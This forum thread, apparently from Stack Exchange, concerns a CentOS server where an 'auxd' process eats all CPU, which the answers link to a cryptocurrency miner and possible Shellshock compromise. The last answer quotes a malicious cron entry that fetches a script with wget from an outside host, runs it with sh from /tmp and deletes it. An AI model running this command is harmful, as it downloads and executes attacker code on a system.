# Centos auxd process hangs

Tags: linux, centos6.5

I'm having a regular problem that I can't figure out what is going wrong.
Every once in a while (I think it is a daily problem), the command `auxd` uses up all my processor capacity. As you can see I'm running this machine in a vmware environment.
I've tried and look what this process is, but it is not common I guess?

I can kill the process, but after a while the process is automatically executed again.
I'm running centos 6.5 with kernel: 2.6.32-504.1.3.el6.x86_64
I've tried updating my system to the latest version but that didn't help. 
This is my top output when the process hangs..

```
PID   USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
46939 root      20   0  778m  20m 1140 S 795.7  0.1   8418:57 auxd
```

Hopefully somebody can point me into the direction what this problem might be or how to solve it.

Comment: This question appears to be off-topic because it is about Unix & Linux (unix.stackexchange.com)

Answer (score 0, accepted):

this process related to a mining program to generate  bitcoin (or other crypto money equivalents) through a site , to see which site it is contacting use htop command or a similar one.

probably you installed such a program or your pc is compromised.

update:
if your computer is compromised there is possibility of an attack to your computer because of recent "Shellshock" vulnerability in bash
look at this for start:
http://www.troyhunt.com/2014/09/everything-you-need-to-know-about.html

Answer (score 0):

I had the same issue I need to kill this process (auxd) and "longone" everyday.
Those files are daily recreated at 12 in /tmp folder. 
I guess my ubuntu 12.04 server is corrupted.
I found a cron Task was active
" wget http://xfsdfadsdgfs.tba.pw/update -O /tmp/update;sh /tmp/update;rm -rf /tmp/update    "
 Hope it helps , i still don't know HOw it appears.